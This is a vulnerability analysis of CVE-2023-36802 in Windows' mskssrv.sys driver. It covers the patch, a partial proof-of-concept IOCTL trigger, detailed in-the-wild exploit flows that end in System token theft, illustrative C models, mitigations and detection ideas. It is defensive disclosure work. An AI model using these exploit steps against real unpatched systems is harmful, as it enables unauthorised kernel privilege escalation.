CVE-2023-36802: Microsoft Streaming Service Proxy Elevation of Privilege Vulnerability

Benoît Sevens

The Basics

Disclosure or Patch Date: September 12, 2023

Product: Windows

Advisory: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36802

Affected Versions:

Windows 10 without KB5030211 or KB5030214
Windows 11 without KB5030219 or KB5030217
Windows Server 2019 without KB5030214
Windows Server 2022 without KB5030216 or KB503025

First Patched Version:

Windows 10 with KB5030211 or KB5030214
Windows 11 with KB5030219 or KB5030217
Windows Server 2019 with KB5030214
Windows Server 2022 with KB5030216 or KB503025

Issue/Bug Report: N/A

Patch CL: N/A

Bug-Introducing CL: N/A

Reporter(s):

Guanghui Xia (@ze0r) with Hebei HuaCe
Quan Jin (@jq0904) & ze0r with DBAPPSecurity WeBin Lab
Valentina Palmiotti with IBM X-Force
Microsoft Threat Intelligence
Microsoft Security Response Center

The Code

Proof-of-concept:

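// Fragment only: the IOCTL_FRAMESERVER_* control codes are not defined here.
HANDLE h;
HRESULT hr;
DWORD bytesReturned;
char buf[0x100] = {0};

// Open the mskssrv device.
hr = KsOpenDefaultDevice(KSNAME_Server, GENERIC_READ | GENERIC_WRITE, &h);

// First IOCTL: allocates an FsContextReg object and stores it in FsContext2.
memset(buf, 'A', sizeof(buf));
*(int32_t *)buf = 1;           // DWORD at offset 0x00
*((int64_t *)buf + 3) = 0;     // QWORD at offset 0x18
BOOL status = DeviceIoControl(h, IOCTL_FRAMESERVER_INIT_CONTEXT, &buf, sizeof(buf), &buf, sizeof(buf), &bytesReturned, 0);

// Second IOCTL on the same handle: FSStreamReg::PublishRx() now treats the
// FsContextReg object as an FsStreamReg object.
memset(buf, 'A', sizeof(buf));
*((DWORD*)buf + 8) = 1;        // DWORD at offset 0x20
*((DWORD*)buf + 9) = 1;        // DWORD at offset 0x24
status = DeviceIoControl(h, IOCTL_FRAMESERVER_PUBLISH_RX, &buf, sizeof(buf), &buf, sizeof(buf), &bytesReturned, 0);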

Exploit sample: Not public

Did you have access to the exploit sample when doing the analysis? Yes

The Vulnerability

Bug class: Type confusion

Vulnerability details:

When an IOCTL_FRAMESERVER_PUBLISH_RX IOCTL is performed on the mskssrv device driver, FSRendezvousServer::PublishRx() is called, which in turn calls FSStreamReg::PublishRx(). FSStreamReg::PublishRx() takes whatever is in the FsContext2 field of the FILE_OBJECT and uses it as a FsStreamReg object from then on, as long as it is a valid object.

An attacker can precede the IOCTL_FRAMESERVER_PUBLISH_RX with an IOCTL_FRAMESERVER_INIT_CONTEXT IOCTL on the same device handle, which initializes the FsContext2 field to an object of a different type, namely FsContextReg.

FSStreamReg::PublishRx() performs several operations on what it thinks is a FsStreamReg object, some of which lead to exploitable scenarios, like writing out of bounds.

A similar vulnerability was present in three other IOCTLs:

IOCTL_FRAMESERVER_PUBLISH_TX
IOCTL_FRAMESERVER_CONSUME_TX
IOCTL_FRAMESERVER_CONSUME_RX

All of these are referred to with the CVE-2023-36802 identifier.
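To make the size mismatch concrete, here is a minimal user-space sketch in C. The 0x78 and 0x1d8 object sizes are the ones given in the exploit flow section of this analysis; the field offset 0x100 is hypothetical and chosen only for illustration, and nothing here reflects the real mskssrv.sys structure layout.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Object sizes as stated in this analysis. */
#define CONTEXT_REG_SIZE 0x78u   /* FsContextReg */
#define STREAM_REG_SIZE  0x1d8u  /* FsStreamReg  */

/* Hypothetical offset of a field that only the larger object has. */
#define STREAM_FIELD_OFFSET 0x100u

/* Returns how many bytes past the end of an allocation of alloc_size
 * an 8-byte read at field_offset reaches (0 if the read is in bounds). */
size_t bytes_out_of_bounds(size_t alloc_size, size_t field_offset)
{
    size_t end = field_offset + sizeof(uint64_t);
    return end > alloc_size ? end - alloc_size : 0;
}

/* Models the confused access: pool starts with a 0x78-byte object
 * followed by neighbouring data, and the field is read as if the
 * object were 0x1d8 bytes long. */
uint64_t read_stream_field(const uint8_t *pool, size_t pool_len)
{
    uint64_t value = 0;
    assert(STREAM_FIELD_OFFSET + sizeof(value) <= pool_len);
    memcpy(&value, pool + STREAM_FIELD_OFFSET, sizeof(value));
    return value;
}
```

In this model, whatever the neighbouring allocation contains at that offset is returned as if it were a member of the object, which is why control over adjacent pool data matters for exploitation.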

Patch analysis:

Before the patch, FSRendezvousServer::PublishRx() would call FSRendezvousServer::FindObject() before calling into FSStreamReg::PublishRx(). FSStreamReg::PublishRx() is called only if FSRendezvousServer::FindObject() returns TRUE. However, FSRendezvousServer::FindObject() did not check the type of the object.

The patch changed FSRendezvousServer::FindObject() to check whether the type field of the object is specifically set to 2, and to return FALSE otherwise. The type field is set to 2 when constructing a FsStreamReg object (in FSStreamReg::FSStreamReg()). Additionally, FSRendezvousServer::FindObject() was renamed to the more appropriate FSRendezvousServer::FindStreamObject().
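The difference between the two lookups can be sketched in C as follows. This is a simplified model, not decompiled driver code: the struct layout and all function names are hypothetical, the search through the server's object list is omitted, and the value 1 for the context type is an assumption (this analysis only states that stream objects use 2).

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

enum {
    REG_TYPE_CONTEXT = 1, /* assumption: only the stream value is given */
    REG_TYPE_STREAM  = 2  /* set in FSStreamReg::FSStreamReg() */
};

/* Hypothetical common header shared by both object types. */
typedef struct reg_object {
    uint32_t type;
} reg_object;

/* Pre-patch behaviour: any registered object is accepted. */
bool find_object(const reg_object *obj)
{
    return obj != NULL;
}

/* Post-patch behaviour: only stream objects are accepted. */
bool find_stream_object(const reg_object *obj)
{
    return obj != NULL && obj->type == REG_TYPE_STREAM;
}

/* Dispatcher model: returns 0 if the stream handler would run,
 * -1 if the object stored on the handle is rejected. */
int publish_rx(const reg_object *obj, bool patched)
{
    bool ok = patched ? find_stream_object(obj) : find_object(obj);
    if (!ok)
        return -1;
    /* With the patched lookup, only stream objects get this far. */
    assert(!patched || obj->type == REG_TYPE_STREAM);
    return 0;
}
```

With a context object on the handle, the unpatched path proceeds into the stream handler while the patched path rejects the request.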

Thoughts on how this vuln might have been found (fuzzing, code auditing, variant analysis, etc.):

The bug could have been found via manual code auditing or fuzzing. As the proof of concept above shows, a combination of two IOCTLs with relatively simple input buffers triggers a crash. Valentina Palmiotti found this vulnerability via manual code auditing, as described in her blog post.

(Historical/present/future) context of bug:

June 16, 2023: CVE-2023-29360, another privilege escalation vulnerability inside mskssrv.sys which was used by Synacktiv at Pwn2Own 2023, is patched and publicly disclosed. Although within the same driver, CVE-2023-29360 is quite distinct from CVE-2023-36802.
September 12, 2023: CVE-2023-36802 is patched and publicly disclosed, and reported to have been seen in the wild.
October 10, 2023: Valentina Palmiotti publishes details of CVE-2023-36802 and its exploitation.

The Exploit

(The terms exploit primitive, exploit strategy, exploit technique, and exploit flow are defined here.)

Exploit strategy (or strategies):

Leak the addresses of relevant kernel objects via the well-known NtQuerySystemInformation technique.
Create a kernel pool layout so that future FSContextReg allocations land in holes surrounded by attacker-controlled data.
Allocate an FSContextReg object (via an IOCTL_FRAMESERVER_INIT_CONTEXT IOCTL).
Trigger an out-of-bounds access on the FSContextReg object (via an IOCTL_FRAMESERVER_PUBLISH_RX IOCTL), which performs a useful write and ultimately sets the PreviousMode of the KTHREAD to 0.
Use NtReadVirtualMemory and NtWriteVirtualMemory on kernel addresses to copy the system token to the EPROCESS of our current process.
Clean up.
Spawn a command of interest, such as cmd.exe.

Exploit flow:

The analyzed in-the-wild sample contains two different exploit flows and selects one based on the Windows version, because two things differ between versions:

the FSStreamReg::PublishRx code is slightly different, i.e. recent mskssrv.sys versions contain a call to ObfDereferenceObject on one of the fields of the FsStreamReg object, while older versions don't
the structure layout of the FsStreamReg object is slightly different. This is important for side effects caused in the exploit flow.

Since newer mskssrv.sys versions contain a convenient call to ObfDereferenceObject, the exploit uses that call to decrement the PreviousMode field directly to 0. We will look at this exploit flow first.
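The effect of such a decrement can be modeled in user space. The sketch below treats the dereference as a plain 64-bit decrement at an attacker-chosen address and ignores where the reference count sits relative to the object pointer. The 0x232 offset for PreviousMode is an assumption used only for illustration, and the model assumes a little-endian machine, as on x64.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define KERNEL_MODE 0
#define USER_MODE   1

/* Assumed offset of PreviousMode inside KTHREAD; illustrative only. */
#define PREVIOUS_MODE_OFFSET 0x232u

/* Models the reference-count decrement: subtract 1 from the 64-bit
 * value stored at target. memcpy avoids unaligned accesses. */
void decrement_qword(uint8_t *target)
{
    uint64_t v;
    memcpy(&v, target, sizeof(v));
    v -= 1;
    memcpy(target, &v, sizeof(v));
}

/* Applies the decrement to a fake thread block and returns the
 * resulting PreviousMode byte. */
uint8_t previous_mode_after_decrement(uint8_t *kthread, size_t len)
{
    assert(PREVIOUS_MODE_OFFSET + sizeof(uint64_t) <= len);
    decrement_qword(kthread + PREVIOUS_MODE_OFFSET);
    return kthread[PREVIOUS_MODE_OFFSET];
}
```

Because the byte starts at 1 (user mode), a single decrement produces 0 (kernel mode) without borrowing from the bytes that follow it.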

Since older mskssrv.sys versions do not contain the convenient ObfDereferenceObject call, the exploit flow is a bit more convoluted. It corrupts a CLFS-specific object to call kernel gadgets via a vtable call.

CLFS-less exploit flow

Open the mskssrv device via a call to KsOpenDefaultDevice.
Leak some required kernel addresses via NtQuerySystemInformation(SystemExtendedHandleInformation, ...):
- the current KTHREAD address (and hence current PreviousMode address)
- EPROCESS address of System process and current process (and hence their respective Token address)
- FILE_OBJECT address of the mskssrv device file handle
Spray the pool with objects of size 0x80 (excluding the 0x10 byte pool header), using the well-known named pipe technique of calling NtFsControlFile with fsctl code 0x119ff8.
Close some pipes to create holes in the pool spray.
Call the IOCTL_FRAMESERVER_INIT_CONTEXT ioctl:
- FsInitializeContextRendezVous() calls FSRendezvousServer::InitializeContext()
- FSRendezvousServer::InitializeContext() allocates an FsContextReg object, which has a size of 0x78 bytes, and sets the FsContext2 field in the FILE_OBJECT to point to this object. The FsContextReg object will take the spot of a previously created hole.
Refill the remaining holes.
Call the IOCTL_FRAMESERVER_PUBLISH_RX ioctl, in a separate thread:
- This will call into FSRendezvousServer::PublishRx() and subsequently FSStreamReg::PublishRx().
- FSStreamReg::PublishRx() will expect a FsStreamReg object in the FsContext2 field, which is 0x1d8 bytes large, while in fact a smaller FsContextReg object is present, neighbored with controlled data.
- FSStreamReg::PublishRx() will then call ObfDereferenceObject() on a field taken out of bounds from a neighboring object. The attacker placed the PreviousMode address of the current thread there. This will decrement the PreviousMode of the main thread to 0. At this point the attacker can call NtReadVirtualMemory and NtWriteVirtualMemory on kernel addresses from the main thread.
- If not taken care of, FSStreamReg::PublishRx() will now call KeSetEvent on another out-of-bounds field, which coincides with the ProcessBilled field from the pool header of a neighboring object (which is not attacker controlled). Since this is an invalid pointer, it would bugcheck the system. To prevent this, the attacker keeps FSStreamReg::PublishRx() spinning in a while loop. This is achieved by forging a self-referencing linked list entry, so that FSFrameMdlList::MoveNext keeps returning the same list entry. The list entry is placed in usermode, so the exploit can break this while loop on demand (see below).
Meanwhile in the main thread:
- Try to read the System process token using NtReadVirtualMemory in a loop until it succeeds. After PreviousMode gets overwritten in the other thread, this will succeed.
- Write the System token to the EPROCESS of the current process using NtWriteVirtualMemory.
- Read the value of the FsContext2 field out of the FILE_OBJECT to get the address of the FsContextReg object.
- Read (for later restoration) the ProcessBilled field in one of the neighboring pool chunk headers and overwrite it with NULL, so KeSetEvent will not crash the system.
- Break the currently locked while loop in FSStreamReg::PublishRx() by changing the self-referencing list entry. FSStreamReg::PublishRx() will now proceed but not call KeSetEvent since the field is NULL.
- Wait for FSStreamReg::PublishRx() to finish in the other thread.
- Restore the corrupted ProcessBilled field to its original value.
- Increment the refcount in the current EPROCESS.
- Reset the PreviousMode to 1.
- Launch a command of interest, such as cmd.exe.
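The reason the 0x78-byte FsContextReg allocation can reuse a hole left by a 0x80-byte sprayed object comes down to chunk size rounding. The following C sketch works through that arithmetic. The 0x10-byte header is taken from the flow above; the 0x10-byte rounding granularity is an assumption about the pool allocator on x64, and the function names are made up for this example.

```c
#include <assert.h>
#include <stddef.h>

#define POOL_HEADER_SIZE 0x10u /* from the analysis */
#define POOL_GRANULARITY 0x10u /* assumption: 16-byte chunk granularity */

/* Total chunk size for a request: header plus data, rounded up
 * to the next multiple of the granularity. */
size_t pool_chunk_size(size_t request)
{
    size_t total = request + POOL_HEADER_SIZE;
    assert(total >= request); /* no wrap-around */
    return (total + POOL_GRANULARITY - 1) & ~(size_t)(POOL_GRANULARITY - 1);
}

/* Non-zero if two request sizes end up with the same chunk size,
 * so that one can reuse a hole freed by the other. */
int same_chunk_size(size_t a, size_t b)
{
    return pool_chunk_size(a) == pool_chunk_size(b);
}
```

Under these assumptions both 0x78 and 0x80 round to a 0x90-byte chunk, whereas a genuine 0x1d8-byte FsStreamReg would need 0x1f0 bytes, so any access beyond the first chunk lands in the neighboring sprayed objects.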

Exploit flow with CLFS

On older systems, FSStreamReg::PublishRx does not contain a call to ObfDereferenceObject. This is unfortunate, as ObfDereferenceObject was a very easy primitive to decrement the PreviousMode.

However, FSStreamReg::PublishRx() will still call FSFrameMdl::UnmapPages() on an address taken out of bounds from a neighboring (sprayed) object, which performs two useful writes relative to that address:

write QWORD 0 at offset 0xc8 from that address
write DWORD 2 at offset 0x10 from that address

How does the exploit leverage this?

Leak the required kernel addresses in the same way as in the CLFS-less exploit flow.
Create a CLFS log file, open it and leak its kernel address (using NtQuerySystemInformation(SystemExtendedHandleInformation, ...)).
Resolve some nt kernel gadgets: PoFxProcessorNotification, IoSizeofWorkItem and RtlClearBit
Forge a fake CClfsContainer object at 0x1000000 with a fake vtable at 0x1000800.
Forge a fake BitMapHeader at 0x1000400 with a bitmap pointer pointing to the PreviousMode address.
Spray the pool (again using NtFsControlFile), but the crafted objects now contain the kernel address of the CLFS log file + 0x2c9.
Create holes, allocate the FsContextReg object in a hole and refill the remaining holes, just as before.
Trigger FSStreamReg::PublishRx(). FSFrameMdl::UnmapPages() will be called on that address read out of bounds and hence write:
- QWORD 0 at offset 0x2c9+0xc8=0x391 from the start of the CLFS log file in memory
- DWORD 2 at offset 0x2c9+0x10=0x2d9 from the start of the CLFS log file in memory
Call CreateLogFile which will end up calling CClfsBaseFilePersisted::CheckSecureAccess.
- CClfsBaseFilePersisted::CheckSecureAccess will use the DWORD at offset 0x398 as an offset from the end of the log block header (of size 0x70) to find a CLFS_CONTAINER_CONTEXT object (via a call to CClfsBaseFile::GetSymbol()). But the QWORD write corrupted the least significant byte of that DWORD, which changes the offset from 0x1460 to 0x1400. So now whatever is at CLFS log file+0x70+0x1400 will be interpreted as a CLFS_CONTAINER_CONTEXT object, and this is attacker-controlled data. At offset 0x18 into this object, a pointer to a CClfsContainer object is dereferenced. The exploit places the address 0x1000000 there, where it previously prepared a fake CClfsContainer object.
- CLFS!CClfsBaseFilePersisted::CheckSecureAccess will then call the first function in the vtable of that object (which is under normal circumstances CClfsContainer::AddRef), passing the object itself as the first argument. The exploit placed the nt!PoFxProcessorNotification function in the fake vtable. (Note that there is CFG in the CLFS driver, so the exploit has to use allowed function addresses as gadgets.)
- nt!PoFxProcessorNotification will dereference a few addresses of its argument and call one of these addresses with another one of these addresses as an argument. So now the exploit controls both the function that is called and its first argument. The exploit chooses nt!RtlClearBit as the function to be called.
- nt!RtlClearBit expects 2 parameters: a pointer to a bitmap header (containing a pointer to the bitmap itself) and a bit number to clear. Recall the exploit prepared a fake bitmap header which has a bitmap pointer pointing to the PreviousMode address. The second argument - the bit number to clear - is not controlled but rdx is conveniently set to 0. nt!RtlClearBit will hence set the PreviousMode field to 0.
- For stability, the exploit prepared a second vtable entry at nt!IoSizeofWorkItem - which does nothing but set eax - because later on CClfsBaseFilePersisted::CheckSecureAccess will call what it thinks is CClfsContainer::Release.
Copy the System process token to the current EPROCESS.
Restore the original 0x1460 offset in the CLFS log file.
Restore the PreviousMode to 1.
Launch a command of interest, such as cmd.exe.
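The offset arithmetic in the flow above can be checked with a small C model. It replays the two UnmapPages() writes against a zeroed buffer standing in for the CLFS log file in memory, using only the offsets given in this analysis. Byte order is handled explicitly as little-endian, and the helper names are invented for this sketch.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define SPRAYED_DELTA   0x2c9u /* added to the log file address in the spray */
#define QWORD_WRITE_OFF 0xc8u  /* UnmapPages() writes QWORD 0 here */
#define DWORD_WRITE_OFF 0x10u  /* UnmapPages() writes DWORD 2 here */
#define CONTEXT_OFF     0x398u /* DWORD later used by CheckSecureAccess */

static uint32_t read_dword_le(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

static void write_dword_le(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)v;
    p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16);
    p[3] = (uint8_t)(v >> 24);
}

/* Applies the two side-effect writes relative to log_file + 0x2c9. */
void apply_unmap_writes(uint8_t *log_file, size_t len)
{
    uint8_t *target = log_file + SPRAYED_DELTA;
    assert(SPRAYED_DELTA + QWORD_WRITE_OFF + 8 <= len);
    memset(target + QWORD_WRITE_OFF, 0, 8);      /* QWORD 0 at 0x391 */
    write_dword_le(target + DWORD_WRITE_OFF, 2); /* DWORD 2 at 0x2d9 */
}

/* Returns the value of the DWORD at 0x398 after the writes. */
uint32_t corrupted_offset(uint32_t original)
{
    uint8_t log_file[0x400];
    memset(log_file, 0, sizeof(log_file));
    write_dword_le(log_file + CONTEXT_OFF, original);
    apply_unmap_writes(log_file, sizeof(log_file));
    return read_dword_le(log_file + CONTEXT_OFF);
}
```

The QWORD write covers bytes 0x391 through 0x398, so only the lowest byte of the DWORD at 0x398 is cleared: `corrupted_offset(0x1460)` yields 0x1400.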

Note that in this version of mskssrv.sys and this exploit flow, the exploit didn't have to take care of the awkward KeSetEvent call. The reason is that the offset to the field passed to KeSetEvent in older versions of mskssrv.sys does not fall within a pool chunk header, but rather in controlled sprayed data and was set to NULL this way.
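The chain of indirect calls in the CLFS flow (vtable slot, then notification gadget, then bit clear) can also be modeled in user space. The C sketch below uses stand-in functions for nt!PoFxProcessorNotification, nt!RtlClearBit and nt!IoSizeofWorkItem. The struct layout is hypothetical, since this analysis does not give the offsets the real gadget reads, and the bitmap buffer is modeled as a byte pointer for simplicity.

```c
#include <assert.h>
#include <stdint.h>

/* Shaped like a bitmap header: a bit count and a pointer to the bits. */
typedef struct bitmap_header {
    uint32_t size_in_bits;
    uint8_t *buffer;
} bitmap_header;

typedef void (*two_arg_fn)(void *arg, uint32_t second);

/* Stand-in for nt!RtlClearBit. */
void model_clear_bit(void *header, uint32_t bit)
{
    bitmap_header *h = header;
    assert(bit < h->size_in_bits);
    h->buffer[bit / 8] &= (uint8_t)~(1u << (bit % 8));
}

struct fake_container;
typedef void (*vtable_fn)(struct fake_container *self);

/* Hypothetical layout of the forged object. */
typedef struct fake_container {
    const vtable_fn *vtable; /* slot 0 is AddRef, slot 1 is Release */
    two_arg_fn inner_fn;     /* function the gadget will call */
    void *inner_arg;         /* first argument for that function */
} fake_container;

/* Stand-in for nt!PoFxProcessorNotification: loads a function and an
 * argument from its own argument and calls one with the other. The
 * second argument is modeled as 0, matching rdx in the analysis. */
void model_notification_gadget(fake_container *self)
{
    self->inner_fn(self->inner_arg, 0);
}

/* Stand-in for nt!IoSizeofWorkItem used as a harmless Release. */
void model_noop(fake_container *self)
{
    (void)self;
}

/* What the corrupted CheckSecureAccess path effectively does. */
void model_check_secure_access(fake_container *c)
{
    c->vtable[0](c); /* believed to be CClfsContainer::AddRef */
    c->vtable[1](c); /* believed to be CClfsContainer::Release */
}
```

Pointing the bitmap buffer at a byte holding 1 and running the model clears bit 0 of that byte, which corresponds to PreviousMode going from 1 to 0.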

Notable differences with Valentina Palmiotti's exploit

It is an interesting exercise to understand the differences between the in the wild exploit described above and the exploit of Valentina Palmiotti as described in her blog post.

Valentina's exploit is based on the recent mskssrv.sys versions. This can be deduced from the presence of an ObfDereferenceObject call in the screenshots. So let's compare her exploit with the "CLFS-less exploit flow".

Valentina uses the "write 2 where" primitive provided by the FSFrameMdl::UnmapPages() call, "in conjunction with the I/O Ring technique". The exploit we analyzed used that primitive for older mskssrv.sys versions (in conjunction with a CLFS technique), but used the "decrement where" primitive provided by the ObfDereferenceObject() call for newer mskssrv.sys versions.
Valentina goes through some more complicated pool grooming in combination with an infoleak in FSStreamReg::GetStats to prevent a later KeSetEvent call from crashing on an invalid pointer. The exploit analyzed here uses a different solution: it triggers the FSStreamReg::PublishRx function from a separate thread and keeps it spinning in a while loop (using a self-referencing linked list entry in usermode), which prevents the KeSetEvent call from being reached. Once it has kernel R/W, it changes the field that triggers the KeSetEvent to NULL and then changes the self-referencing linked list entry so the while loop breaks. This means the KeSetEvent call will be skipped. (Afterwards it restores the field that would have triggered the KeSetEvent call, because that field is the owning process EPROCESS pointer in a pool chunk header.)
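The self-referencing list trick can be illustrated with a single-threaded C simulation. The second thread is replaced by a step function invoked once per loop iteration. The NULL-terminated walk, the struct names and the iteration at which the "main thread" acts are all assumptions made for this sketch; the real FSFrameMdlList termination condition is not described in this analysis.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

typedef struct node {
    struct node *next;
} node;

/* State of the simulated main thread. */
typedef struct main_thread {
    unsigned release_at;    /* iteration at which kernel R/W is available */
    uintptr_t *event_field; /* value that would be handed to KeSetEvent */
    node *entry;            /* the self-referencing entry in user memory */
} main_thread;

/* Stands in for the work the main thread does concurrently. */
static void main_thread_step(main_thread *m, unsigned iteration)
{
    if (iteration == m->release_at) {
        *m->event_field = 0;   /* NULL the field so the event is skipped */
        m->entry->next = NULL; /* break the self-reference */
    }
}

/* Walks the list as the confused PublishRx loop would. Returns 1 if the
 * event would be signalled afterwards (a crash in the real scenario),
 * 0 if that call is skipped. */
int publish_rx_model(node *first, uintptr_t *event_field,
                     main_thread *m, unsigned max_iter,
                     unsigned *iterations)
{
    unsigned n = 0;
    for (node *cur = first; cur != NULL; cur = cur->next) {
        assert(n < max_iter); /* guard against a model that never releases */
        main_thread_step(m, n);
        n++;
    }
    *iterations = n;
    return *event_field != 0;
}
```

As long as the entry points to itself the walk makes no progress; once the simulated main thread clears the event field and the link, the loop exits and the event call is skipped.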

Known cases of the same exploit flow:

The in-the-wild exploited CVE-2022-37969 CLFS vulnerability followed a very similar exploit flow, as described in Zscaler's blog post.

Part of an exploit chain? This exploit was likely used as a standalone local privilege escalation.

The Next Steps

Variant analysis

Areas/approach for variant analysis (and why): Given the relatively simple nature of this vulnerability and of CVE-2023-29360, more fuzzing and code auditing of mskssrv.sys could yield more bugs.

Found variants: N/A

Structural improvements

What are structural improvements such as ways to kill the bug class, prevent the introduction of this vulnerability, mitigate the exploit flow, make this type of vulnerability harder to exploit, etc.?

Ideas to kill the bug class:

CastGuard could have potentially caught this bug, since it seems (based on their vtables) that both the FsStreamReg and FsContextReg type derive from the same FsRegObject class.

Ideas to mitigate the exploit flow:

MTE and CHERI would not catch the type confusion, but would catch the out of bounds access as a consequence of the type confusion.
SMAP would catch the user mode access in FSStreamReg::PublishRx when dereferencing the fake FSFrameMdl pointer in the CLFS-less exploit flow. In the CLFS exploit flow, SMAP would catch the fake CClfsContainer object vtable access in usermode.
Remove kernel address leaks via NtQuerySystemInformation calls.

Other potential improvements:

N/A

0-day detection methods

What are potential detection methods for similar 0-days? Meaning are there any ideas of how this exploit or similar exploits could be detected as a 0-day?

Static signaturing of used exploit techniques (e.g. using Yara).
Analysing samples based on interesting dynamic signals, such as NtQuerySystemInformation calls using the SystemExtendedHandleInformation parameter.

Other References

Critically close to zero(day): Exploiting Microsoft Kernel streaming service by Valentina Palmiotti